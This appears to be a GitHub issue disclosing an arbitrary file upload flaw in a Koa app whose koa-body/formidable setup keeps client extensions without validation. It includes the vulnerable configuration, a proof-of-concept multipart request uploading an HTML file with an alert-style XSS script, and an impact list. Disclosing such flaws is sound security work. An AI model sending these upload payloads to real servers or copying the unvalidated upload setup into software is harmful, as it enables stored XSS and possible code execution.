
Arbitrary File Upload Vulnerability

Open NinjaGPT opened this issue 10 months ago • 0 comments

Summary

The project uses formidable with keepExtensions set to true and has no other file-upload validation. This allows attackers to upload malicious files with arbitrary extensions, creating vectors for stored Cross-Site Scripting (XSS) and potentially even Remote Code Execution (RCE).

Details

Code Analysis

package.json

"koa-body": "^4.2.0",

node_modules\koa-body\package.json

"@types/formidable": "^1.0.31",

src\app.ts

app.use(
  KoaBody({
    // enable multipart (file) uploads
    multipart: true,
    formidable: {
      // upload directory
      uploadDir: Path.join(__dirname, '../public/uploads'),
      // keep the client-supplied file extension
      keepExtensions: true,
    },
  })
)

Here, global file upload requests are configured to be handled by Formidable, and file extensions are preserved (keepExtensions: true). This means I can send any file upload request to the service without needing to know what the endpoint is.

POC

POST /testyadfygsudsaidusod HTTP/1.1
Host: 127.0.0.1:6200
Content-Length: 207
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykydz3yRY7gBp5Pa6

------WebKitFormBoundarykydz3yRY7gBp5Pa6
Content-Disposition: form-data; name="file1"; filename="xss3.html"
Content-Type: image/jpeg

<script>alert(3)</script>
------WebKitFormBoundarykydz3yRY7gBp5Pa6--

Upload an HTML file containing an XSS vector. From the HTTP response, we can see that the file's URL is not returned.


When we looked at the corresponding directory for storing uploaded files /public/uploads, we discovered that the malicious file had already been successfully uploaded.

2025/02/26  16:28    <DIR>          .
2025/02/26  16:16    <DIR>          ..
2025/02/26  16:28                25 upload_8be0c1b8e1a8794985aa7420ed588ace.html

Impact

  • Code execution:
    • Allows attackers to upload server-side script files such as PHP, JSP, etc.
    • If the target server has a corresponding interpreter, this may lead to remote code execution
  • Client-side attacks:
    • Enables attackers to upload files with extensions such as HTML or PDF that contain malicious scripts
    • This creates stored XSS attack vectors that target the application's users

NinjaGPT, Apr 08 '25 01:04